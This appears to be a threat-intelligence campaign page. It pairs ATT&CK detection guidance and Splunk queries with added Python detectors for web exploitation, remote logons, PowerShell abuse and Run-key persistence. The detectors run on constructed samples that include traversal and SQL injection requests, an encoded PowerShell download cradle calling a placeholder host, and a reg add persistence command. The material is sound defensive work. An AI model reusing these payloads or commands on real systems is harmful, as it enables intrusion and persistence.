
PassiveNeuron-X
Indicators of Compromise
No domains found for this campaign
Campaign Guidance
Remediation, mitigation, notes, history and related intelligence
REMEDIATION
T1190 - Exploit Public-Facing Application
Detects:
- Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Web Application Firewalls may detect improper inputs attempting exploitation. Web server logs (e.g., /var/log/httpd or /var/log/apache for Apache web servers on Linux) may also record evidence of exploitation.
  (source="C:\inetpub\logs\LogFiles\W3SVC*" OR source="/var/log/apache2/access.log" OR source="/var/log/nginx/access.log")
  | eval exploit_attempt=if(like(cs_uri_query, "%exec%") OR like(cs_uri_query, "%cmd%") OR like(cs_uri_query, "%cat /etc/passwd%") OR like(cs_uri_query, "%../../%"), 1, 0)
  | where exploit_attempt=1
  | stats count latest(_time) as _time by src_ip, cs_uri_query, sc_status
  | where count > 5
  | table _time, src_ip, cs_uri_query, sc_status, count
- Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection strings or known payloads. For example, monitor for successively chained functions that adversaries commonly abuse (i.e., gadget chaining) through unsafe deserialization to exploit publicly facing applications for initial access.[114] In AWS environments, monitor VPC flow logs and/or Elastic Load Balancer (ELB) logs going to and from instances hosting externally accessible applications.
  (source="/var/log/zeek/http.log" OR source="C:\Windows\System32\LogFiles\Firewall")
  | regex http_request="(?i)select.from|union.select|cmd=.|exec=."
  | stats count latest(_time) as _time by src_ip, dest_ip, http_method, uri_path
  | where count > 10
  | table _time, src_ip, dest_ip, http_method, uri_path, count
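The two queries above look for the same signatures (command parameters, /etc/passwd, directory traversal, SQL keywords) in web server logs and count hits per source address. The following Python is an added example, not part of the campaign page or of any vendor tooling, that applies the same logic offline to a few constructed access-log lines in combined log format. It goes one step further than the queries by URL-decoding the request before matching, so that percent-encoded traversal (`%2e%2e%2f`) is caught as well; the log lines, the threshold and the signature names are assumptions made for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512
203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 404 210
203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 404 210
203.0.113.7 - - [01/Jan/2024:10:00:04 +0000] "GET /shell.php?cmd=id HTTP/1.1" 404 210
203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /admin.php?exec=whoami HTTP/1.1" 403 199
203.0.113.7 - - [01/Jan/2024:10:00:06 +0000] "GET /search.php?q=1%27%20UNION%20SELECT%20user,pass%20FROM%20users-- HTTP/1.1" 500 0
203.0.113.7 - - [01/Jan/2024:10:00:07 +0000] "GET /dl.php?f=..%2F..%2Fconfig.ini HTTP/1.1" 200 1024
198.51.100.3 - - [01/Jan/2024:10:00:08 +0000] "GET /index.php?page=../../etc/passwd HTTP/1.1" 404 210
192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "POST /login HTTP/1.1" 302 0
"""

# Combined log format: client IP, identity, user, [timestamp], "request", status, bytes.
LOG_RE = re.compile(
    r'^(?P<src_ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\d+|-)'
)

# Signatures mirroring the two queries: command parameters, /etc/passwd,
# directory traversal and SQL injection keywords (names are our own).
SIGNATURES = {
    "cmd_param": re.compile(r"(?i)(?:^|[?&;])(?:cmd|exec)="),
    "etc_passwd": re.compile(r"/etc/passwd"),
    "traversal": re.compile(r"\.\./\.\./"),
    "sqli": re.compile(r"(?i)\bunion\b.{0,40}\bselect\b|\bselect\b.{0,80}\bfrom\b"),
}


def parse_line(line):
    """Parse one combined-log line into a dict, or return None if it does not fit."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Decode twice so double-encoded sequences (%252e) normalise as well.
    rec["uri_decoded"] = unquote(unquote(rec["uri"]))
    return rec


def classify(uri_decoded):
    """Names of the signatures that match the decoded request URI (sorted)."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(uri_decoded))


def summarize(lines, threshold=5):
    """Per-source summary of exploit attempts, keeping only sources over the threshold.

    Mirrors 'stats count by src_ip ... | where count > 5' from the first query."""
    per_ip = defaultdict(lambda: {"count": 0, "tags": set(), "statuses": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec["uri_decoded"])
        if not tags:
            continue
        entry = per_ip[rec["src_ip"]]
        entry["count"] += 1
        entry["tags"].update(tags)
        entry["statuses"].add(rec["status"])
    return {ip: e for ip, e in per_ip.items() if e["count"] > threshold}


if __name__ == "__main__":
    for ip, e in summarize(SAMPLE_LOG.splitlines()).items():
        print(ip, e["count"], sorted(e["tags"]), sorted(e["statuses"]))
```

The status codes are kept in the summary on purpose: a burst of 404/403 responses is reconnaissance noise, while a 200 on a traversal request is the line an analyst wants to open first.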
T1071 - Application Layer Protocol
Detects:
- Monitor and analyze traffic patterns and packet inspection associated with protocol(s), leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows (e.g., extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous process execution and command line arguments associated with traffic patterns (e.g., monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).
- Monitor and analyze traffic flows that do not follow the expected protocol standards and traffic flows (e.g., extraneous packets that do not belong to established flows, or gratuitous or anomalous traffic patterns). Consider correlation with process monitoring and command line to detect anomalous process execution and command line arguments associated with traffic patterns (e.g., monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).
T1055 - Process Injection
Detects:
- Monitor for contextual data about a file, which may include information such as name, the content (e.g., signature, headers, or data/media), user/owner, permissions, etc.
- Monitor for changes made to files that may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges.
- Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.
- Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.[95] Monitoring for Linux-specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.[96][97][98][99]
- Monitor for processes being accessed in ways that may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges.
- Monitor for process memory inconsistencies, such as checking memory ranges against a known copy of the legitimate module.[100]
- Monitor for changes made to processes that may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges.
T1021 - Remote Services
Detects:
- Monitor executed commands and arguments that may use Valid Accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.
  Analytic 1 - Detect adversary commands executed via remote sessions
  index=* (sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" OR sourcetype="/var/log/auth.log") AND (EventCode=1 OR EventCode=sshd)
  | search parent_process_name="sshd" OR parent_process_name="mstsc.exe" OR parent_process_name="rdpclip.exe"
  | eval suspicious_command=case(match(command_line, "net user|powershell|/etc/passwd|nc|curl|socat"), "high", match(command_line, "whoami|ls|dir|pwd"), "low", true(), "normal")
  | stats count by host, process_name, command_line, suspicious_command, _time
  | where count > threshold AND suspicious_command="high"
  | table _time, host, process_name, command_line, suspicious_command
- Monitor for user accounts logged into systems they would not normally access or abnormal access patterns, such as multiple systems over a relatively short period of time. Correlate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. Adversaries will likely need to learn about an environment and the relationships between systems through Discovery techniques prior to attempting Lateral Movement. For example, in macOS you can review logs for "screensharingd" and "Authentication" event messages. [7][18]
  Note: When using Security event ID 4624, %$ means user names that do not end with the $ character. Usually, computer account or local system account names end with the $ character. When using Security event 4624, UserName and UserLogonId correspond to TargetUserName and TargetLogonId respectively. When using Security event 4624, LogonType 3 corresponds to a Network Logon.
  Analytic 1 - New services being created under network logon sessions by non-system users
  (sourcetype="WinEventLog:Security" EventCode IN (4624, 4648, 4625)) AND LogonType="3" AND UserName NOT '$'
  | rename UserLogonId AS LogonID
  | join type=inner LogonID [| search (source="WinEventLog:Security" EventCode="4697") | rename UserLogonId as LogonID]
- Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes, that may use Valid Accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.
  Note: On Windows, Sysmon Event ID 7 (Image loaded) can be used to monitor the loading of DLLs into processes, including those designed to accept remote connections. This is a particularly noisy event and can generate a large volume of data, so we recommend baselining and filtering out any known benign processes and modules to help reduce the number of events that are produced.
- Monitor interactions with network shares, such as reads or file transfers, using remote services such as Server Message Block (SMB).
- Monitor for newly constructed network connections that may use Valid Accounts to log into a service specifically designed to accept remote connections, such as RDP, telnet, SSH, and VNC. Monitor network connections involving common remote management protocols, such as ports tcp:3283 and tcp:5900, as well as ports tcp:3389 and tcp:22 for remote login.
  index="network_logs" sourcetype="network_connection"
  | search protocol IN ("tcp/22", "tcp/3389", "tcp/5900")
  | stats count by src_ip, dest_ip, dest_port, _time
  | eval suspicious_connection=if(src_ip NOT IN ("trusted_sources") AND count > threshold, "high", "normal")
  | where suspicious_connection="high"
  | table _time, src_ip, dest_ip, dest_port, suspicious_connection
- Monitor network data for uncommon data flows that may be related to abuse of Valid Accounts to log into a service specifically designed to accept remote connections, such as RDP, telnet, SSH, and VNC.
  Note: Network analysis frameworks such as Zeek can be used to capture, decode, and alert on network service protocols such as SSH and RDP.
  Analytic 1 - Suspicious Protocols
  sourcetype="netflow" | search dest_port=22 OR dest_port=3389 OR dest_port=5900 OR dest_port=3283 // SSH, RDP, VNC, ARD
- Monitor for newly executed processes that may use Valid Accounts to log into a service specifically designed to accept remote connections, such as RDP, telnet, SSH, and VNC. The adversary may then perform actions that spawn additional processes as the logged-on user. Malicious actors may rename built-in commands or external tools, such as those provided by SysInternals, to better blend in with the environment. In those cases, the file path name is arbitrary and may blend in well with the background. If the arguments are closely inspected, it may be possible to infer what tools are running and understand what an adversary is doing. When any legitimate software shares the same command lines, it must be whitelisted according to the expected parameters. Any tool of interest with commonly known command line usage can be detected by command line analysis. Known substrings of command lines include:
  Analytic 1 - Suspicious Arguments
  (sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (sourcetype="WinEventLog:Security" EventCode="4688") AND CommandLine="-R . -pw" OR CommandLine="-pw . . .@." OR CommandLine="sekurlsa" OR CommandLine=" -hp " OR CommandLine=". a .*"
- Monitor for newly constructed WMI objects that are often used to log into a service that accepts remote connections.
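The "new services under network logon sessions" analytic above is a join: take 4624 events with LogonType 3 whose account name does not end in "$", then look up 4697 service-install events that carry the same logon ID. The Python below is an added example (not from the campaign page or any product) that performs that join over a handful of constructed Security events. Field names follow the 4624/4697 event schema; the assumption that 4697 records the installing session in SubjectLogonId, and the sample values themselves, are ours. It also keys sessions by host as well as logon ID, because logon IDs are only unique per machine.

```python
# Constructed Windows Security events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventCode": 4624, "Computer": "FS01", "TargetUserName": "DC01$",
     "TargetLogonId": "0x3e7a1", "LogonType": 3, "IpAddress": "10.0.0.5"},
    {"EventCode": 4624, "Computer": "FS01", "TargetUserName": "jdoe",
     "TargetLogonId": "0x5f22b", "LogonType": 3, "IpAddress": "10.0.0.77"},
    {"EventCode": 4624, "Computer": "WS07", "TargetUserName": "jdoe",
     "TargetLogonId": "0x5f300", "LogonType": 2, "IpAddress": "-"},
    # 4697: a service was installed; SubjectLogonId is the installing session (assumption).
    {"EventCode": 4697, "Computer": "FS01", "SubjectLogonId": "0x5f22b",
     "ServiceName": "updsvc", "ServiceFileName": "C:\\Windows\\Temp\\u.exe"},
    {"EventCode": 4697, "Computer": "FS01", "SubjectLogonId": "0x3e7a1",
     "ServiceName": "BackupAgent", "ServiceFileName": "C:\\Program Files\\Backup\\agent.exe"},
    {"EventCode": 4697, "Computer": "WS07", "SubjectLogonId": "0x5f300",
     "ServiceName": "DevTool", "ServiceFileName": "C:\\Tools\\devtool.exe"},
]


def is_computer_account(name):
    """Computer and local system account names end with '$' (the NOT '$' filter)."""
    return name.endswith("$")


def network_logons(events):
    """Map (Computer, LogonId) -> 4624 record for LogonType 3 logons by non-computer accounts.

    Keying on the host too matters: logon IDs are unique per machine, not per domain."""
    sessions = {}
    for ev in events:
        if ev.get("EventCode") != 4624 or ev.get("LogonType") != 3:
            continue
        if is_computer_account(ev["TargetUserName"]):
            continue
        sessions[(ev["Computer"], ev["TargetLogonId"])] = ev
    return sessions


def services_from_network_sessions(events):
    """Inner join of 4697 service installs onto network logon sessions on the same host."""
    sessions = network_logons(events)
    hits = []
    for ev in events:
        if ev.get("EventCode") != 4697:
            continue
        logon = sessions.get((ev["Computer"], ev["SubjectLogonId"]))
        if logon is None:
            continue  # interactive logon, computer account, or unknown session
        hits.append({
            "host": ev["Computer"],
            "user": logon["TargetUserName"],
            "source_ip": logon["IpAddress"],
            "logon_id": ev["SubjectLogonId"],
            "service": ev["ServiceName"],
            "image": ev["ServiceFileName"],
        })
    return hits


if __name__ == "__main__":
    for hit in services_from_network_sessions(SAMPLE_EVENTS):
        print(hit)
```

In the sample, only the service installed under jdoe's network logon on FS01 survives the join: the BackupAgent install belongs to a computer account and the DevTool install happened under an interactive (LogonType 2) session.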
T1090 - Proxy
Detects:
- Monitor for newly constructed network connections that are sent or received by untrusted hosts.
- Monitor and analyze traffic patterns and packet inspection associated with protocol(s) that do not follow the expected protocol standards and traffic flows (e.g., extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous process execution and command line arguments associated with traffic patterns (e.g., monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).
- Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.
T1083 - File and Directory Discovery
Detects:
- Monitor executed commands and arguments that may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users. On ESXi servers, monitor for commands that leverage tools like grep and find to search for files with VM extensions such as vmdk, or in VM-related paths such as /vmfs/*.[401][402][403]
- Monitor for API calls that may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
- Monitor newly executed processes that may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
T1057 - Process Discovery
Detects:
- Monitor executed commands and arguments for actions that may attempt to get information about running processes on a system.
- Monitor for API calls that may attempt to get information about running processes on a system.
- Monitor for newly executed processes that may attempt to get information about running processes on a system. To be effective in deciphering malicious and benign activity, the full command line is essential. Similarly, having information about the parent process can help with making decisions and tuning to an environment. Because these commands are built in, they may be run frequently by power users or even by normal users. Thus, an analytic looking at this information should have well-defined white- or blacklists, and should consider looking at an anomaly detection approach, so that this information can be learned dynamically. Within the built-in Windows commands:
  Analytic 1 - Host Discovery Commands
  (source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688") (Image="C:\Windows\\hostname.exe" OR Image="C:\Windows\\ipconfig.exe" OR Image="C:\Windows\\net.exe" OR Image="C:\Windows\\quser.exe" OR Image="C:\Windows\\qwinsta.exe" OR (Image="C:\Windows\\sc.exe" AND (CommandLine=" query " OR CommandLine=" qc ")) OR Image="C:\Windows\\systeminfo.exe" OR Image="C:\Windows\\tasklist.exe" OR Image="C:\Windows\*\whoami.exe")
  | stats values(Image) as "Images" values(CommandLine) as "Command Lines" by ComputerName
T1059.001 - PowerShell
Detects:
- If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity. It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). [321] PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.[322] An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data. PowerShell can be used over WinRM to remotely run commands on a host. When a remote PowerShell session starts, svchost.exe executes wsmprovhost.exe. For this to work, certain registry keys must be set, and the WinRM service must be enabled. The PowerShell command Enter-PSSession -ComputerName <RemoteHost> creates a remote PowerShell session.
  Analytic 1 - Look for unusual PowerShell execution
  sourcetype=WinEventLog:Microsoft-Windows-PowerShell/Operational
  | search EventCode=4104
  | eval suspicious_cmds=if(like(Message, "%-EncodedCommand%") OR like(Message, "%Invoke-Expression%") OR like(Message, "%IEX%") OR like(Message, "%DownloadFile%"), "Yes", "No")
  | where suspicious_cmds="Yes"
- Monitor for loading and/or execution of artifacts associated with PowerShell-specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).[3][4]
  Analytic 1 - Processes loading PowerShell assemblies
  sourcetype=WinEventLog:Microsoft-Windows-Sysmon/Operational
  | search EventCode=7 ImageLoaded IN ("C:\Windows\System32\System.Management.Automation.dll", "C:\Windows\System32\powershell.exe")
- Monitor for newly executed processes that may abuse PowerShell commands and scripts for execution. PowerShell is a scripting environment included with Windows that is used by both attackers and administrators. Execution of PowerShell scripts in most Windows versions is opaque and not typically secured by antivirus, which makes using PowerShell an easy way to circumvent security measures. This analytic detects execution of PowerShell scripts. PowerShell can be used to hide monitored command line execution such as: net use, sc start
  Note:
  - The logic for Analytic 1 is based around detecting non-interactive PowerShell sessions (i.e., those not launched by a user through explorer.exe). This may lead to false positives when used in a production environment, so we recommend tuning any such analytics by including additional logic (e.g., looking for suspicious parent processes) that helps filter such events.
  - The logic for Analytic 2 is based around detecting remote PowerShell sessions. PowerShell can be used over WinRM to remotely run commands on a host. When a remote PowerShell session starts, svchost.exe executes wsmprovhost.exe.
  Analytic 1 - Non-interactive PowerShell Sessions
  (source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688") Image="powershell.exe" AND ParentImage!="explorer.exe"
  Analytic 2 - Remote PowerShell Sessions
  (source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688") Image="wsmprovhost.exe" AND ParentImage="svchost.exe"
  Analytic 3 - PowerShell Execution
  (source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") Image="C:\Windows\\powershell.exe" ParentImage!="C:\Windows\explorer.exe"
  | stats values(CommandLine) as "Command Lines" values(ParentImage) as "Parent Images" by ComputerName
- Consider monitoring for Windows event ID (EID) 400, which shows the version of PowerShell executing in the EngineVersion field (which may also be relevant to detecting a potential Downgrade Attack) as well as whether PowerShell is running locally or remotely in the HostName field. Furthermore, EID 400 may indicate the start time and EID 403 indicates the end time of a PowerShell session.[323]
- Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
  Analytic 1 - Script Block Logging Events
  (source=WinEventLog:"Microsoft-Windows-PowerShell/Operational" EventID="4104" AND Image="powershell.exe" AND (CommandLine="-enc" OR CommandLine="-ep bypass" OR CommandLine="-noni*")
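Two of the items above are worth seeing as code together: the 4104 script-block query that matches literal strings such as -EncodedCommand, Invoke-Expression, IEX and DownloadFile, and the EID 400 EngineVersion check for a downgrade to a PowerShell version without script-block logging. The Python below is an added example (not from the campaign page or any product) that triages a few constructed events. Its one addition to the page's logic is that the short aliases of -EncodedCommand (-e, -ec, -enc) carry a base64 UTF-16LE script that a literal match never sees, so the argument is decoded and rescanned; the event layout, sample messages and indicator names are assumptions for the example.

```python
import base64
import re

# Indicators taken from the 4104 query above. IEX is matched as a whole word so that
# ordinary identifiers containing those letters do not fire.
INDICATORS = {
    "EncodedCommand": re.compile(r"(?i)-encodedcommand\b"),
    "Invoke-Expression": re.compile(r"(?i)invoke-expression"),
    "IEX": re.compile(r"(?i)\biex\b"),
    "DownloadFile": re.compile(r"(?i)downloadfile"),
}

# -e, -ec, -enc and -EncodedCommand all take a base64-encoded UTF-16LE script.
ENC_ARG = re.compile(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(text):
    """Return the decoded script if text carries an encoded-command argument, else None."""
    m = ENC_ARG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not a well-formed payload; treat as no decode


def triage_script_block(message):
    """Scan a 4104 message and, if present, its decoded encoded-command payload."""
    decoded = decode_encoded_command(message)
    found = set()
    for name, rx in INDICATORS.items():
        if rx.search(message) or (decoded is not None and rx.search(decoded)):
            found.add(name)
    if decoded is not None:
        found.add("EncodedCommand")  # the alias forms count as -EncodedCommand too
    return {"indicators": sorted(found), "decoded": decoded}


def is_downgrade_candidate(engine_version):
    """EID 400 EngineVersion below 5 means no script-block logging: a downgrade candidate."""
    major = int(engine_version.split(".")[0])
    return major < 5


def _b64ps(script):
    # Helper used only to build the constructed sample event below.
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventCode": 4104, "Message": "Creating Scriptblock text (1 of 1):\nGet-Process | Sort-Object CPU -Descending"},
    {"EventCode": 4104, "Message": "Creating Scriptblock text (1 of 1):\npowershell.exe -nop -w hidden -enc "
     + _b64ps("IEX (New-Object Net.WebClient).DownloadFile('http://example.invalid/a.txt','a.txt')")},
    {"EventCode": 400, "EngineVersion": "2.0", "HostName": "ConsoleHost"},
    {"EventCode": 400, "EngineVersion": "5.1.19041.1", "HostName": "ServerRemoteHost"},
]


def triage(events):
    """Return (index, finding, detail) for each event that trips a check."""
    findings = []
    for i, ev in enumerate(events):
        if ev["EventCode"] == 4104:
            result = triage_script_block(ev["Message"])
            if result["indicators"]:
                findings.append((i, "suspicious_script_block", result["indicators"]))
        elif ev["EventCode"] == 400 and is_downgrade_candidate(ev["EngineVersion"]):
            findings.append((i, "engine_downgrade", ev["EngineVersion"]))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Against the raw text of the second sample message, the page's four literal strings match nothing; only after decoding the -enc argument do IEX and DownloadFile appear, which is why the decode step belongs in the analytic rather than in a later manual review.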
T1547.001 - Registry Run Keys / Startup Folder
Detects:
- Monitor executed commands and arguments that may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key.
- Monitor the startup folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including the startup folders. [313]
- Monitor for newly executed processes executed from the Run/RunOnce registry keys through Windows EID 9707 or "Software\Microsoft\Windows\CurrentVersion\Run" and "Software\Microsoft\Windows\CurrentVersion\RunOnce" registry keys with the full command line. Registry modifications are often essential in establishing persistence via known Windows mechanisms. Many legitimate modifications are done graphically via regedit.exe or by using the corresponding channels, or even calling the Registry APIs directly. The built-in utility reg.exe provides a command-line interface to the registry, so that queries and modifications can be performed from a shell, such as cmd.exe. When a user is responsible for these actions, the parent of cmd.exe will likely be explorer.exe. Occasionally, power users and administrators write scripts that do this behavior as well, but likely from a different process tree. These background scripts must be learned so they can be tuned out accordingly.
  Output Description: the sequence of processes that resulted in reg.exe being started from a shell. That is, a hierarchy that looks like
  - great-grand_parent.exe
  - grand_parent.exe
  - parent.exe
  - reg.exe
  Analytic 1 - Reg.exe called from Command Shell
  (source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688") Image="reg.exe" AND ParentImage="cmd.exe"
  | join left=L right=R where L.ParentProcessGuid = R.ProcessGuid [search EventCode IN (1, 4688) Image="cmd.exe" ParentImage!="explorer.exe"]
- Monitor for newly created Windows Registry keys that may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key.
- Monitor the Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations. [313] Detection of the modification of the registry key Common Startup located in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\ and HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders. When a user logs on, any files located in the Startup Folder are launched. Attackers may modify these folders with other files in order to evade detection set on these default folders. This detection focuses on EventIDs 4688 and 1 for process creation and EventID 4657 for the modification of the Registry Keys.
  Analytic 1 - Modification of Default Startup Folder in the Registry Key ‘Common Startup’
  (source="WinEventLog:Security" EventCode="4657" ObjectValueName="Common Startup") OR (source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="13" TargetObject="*Common Startup")
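The "Reg.exe called from Command Shell" analytic above joins the reg.exe process-creation event to its cmd.exe parent and keeps only shells that were not started by explorer.exe; its output is the ancestry chain (great-grandparent, grandparent, parent, reg.exe). The Python below is an added example, not from the campaign page or any product, that rebuilds that chain from constructed Sysmon Event ID 1 records linked by ProcessGuid/ParentProcessGuid, applies the explorer.exe exclusion, and tags command lines that touch the Run/RunOnce keys named in the same item. Event contents and GUID values are assumptions made for the example.

```python
# Constructed Sysmon Event ID 1 records (not real telemetry).
SAMPLE_EVENTS = [
    {"ProcessGuid": "g-explorer", "ParentProcessGuid": "g-userinit",
     "Image": "C:\\Windows\\explorer.exe", "ParentImage": "C:\\Windows\\System32\\userinit.exe",
     "CommandLine": "C:\\Windows\\Explorer.EXE"},
    # Benign: an administrator queries the Run key from an interactive shell.
    {"ProcessGuid": "g-cmd1", "ParentProcessGuid": "g-explorer",
     "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "\"C:\\Windows\\System32\\cmd.exe\""},
    {"ProcessGuid": "g-reg1", "ParentProcessGuid": "g-cmd1",
     "Image": "C:\\Windows\\System32\\reg.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"},
    # Suspicious: a script host spawns a shell that writes a Run key value.
    {"ProcessGuid": "g-wscript", "ParentProcessGuid": "g-explorer",
     "Image": "C:\\Windows\\System32\\wscript.exe", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "wscript.exe C:\\Users\\Public\\setup.vbs"},
    {"ProcessGuid": "g-cmd2", "ParentProcessGuid": "g-wscript",
     "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\System32\\wscript.exe",
     "CommandLine": "cmd.exe /c reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater /d C:\\Users\\Public\\setup.vbs"},
    {"ProcessGuid": "g-reg2", "ParentProcessGuid": "g-cmd2",
     "Image": "C:\\Windows\\System32\\reg.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater /d C:\\Users\\Public\\setup.vbs"},
]

# Run-key paths from the item above, lower-cased for matching.
RUN_KEYS = (
    "software\\microsoft\\windows\\currentversion\\run",
    "software\\microsoft\\windows\\currentversion\\runonce",
)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestry(events_by_guid, guid, max_depth=16):
    """Image basenames from the oldest known ancestor down to the process `guid`."""
    chain, seen = [], set()
    while guid in events_by_guid and guid not in seen and len(chain) < max_depth:
        seen.add(guid)  # guard against cycles in malformed data
        ev = events_by_guid[guid]
        chain.append(basename(ev["Image"]))
        guid = ev["ParentProcessGuid"]
    return list(reversed(chain))


def reg_from_shell(events):
    """reg.exe started by cmd.exe where the shell itself was not started by explorer.exe."""
    by_guid = {ev["ProcessGuid"]: ev for ev in events}
    hits = []
    for ev in events:
        if basename(ev["Image"]) != "reg.exe":
            continue
        parent = by_guid.get(ev["ParentProcessGuid"])
        if parent is None or basename(parent["Image"]) != "cmd.exe":
            continue
        if basename(parent["ParentImage"]) == "explorer.exe":
            continue  # interactive user shell: the analytic tunes these out
        cmdline = ev["CommandLine"]
        hits.append({
            "chain": ancestry(by_guid, ev["ProcessGuid"]),
            "command_line": cmdline,
            "touches_run_key": any(k in cmdline.lower() for k in RUN_KEYS),
        })
    return hits


if __name__ == "__main__":
    for hit in reg_from_shell(SAMPLE_EVENTS):
        print(" -> ".join(hit["chain"]), "| run key:", hit["touches_run_key"])
```

The first reg.exe (explorer.exe, cmd.exe, reg.exe) is dropped by the explorer.exe rule; the second is reported with its full chain, which is what an analyst needs to decide whether wscript.exe launching a shell is one of the "background scripts" the item says must be learned and tuned out.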
T1027 - Obfuscated Files or Information
Detects:
- The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detection will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network.
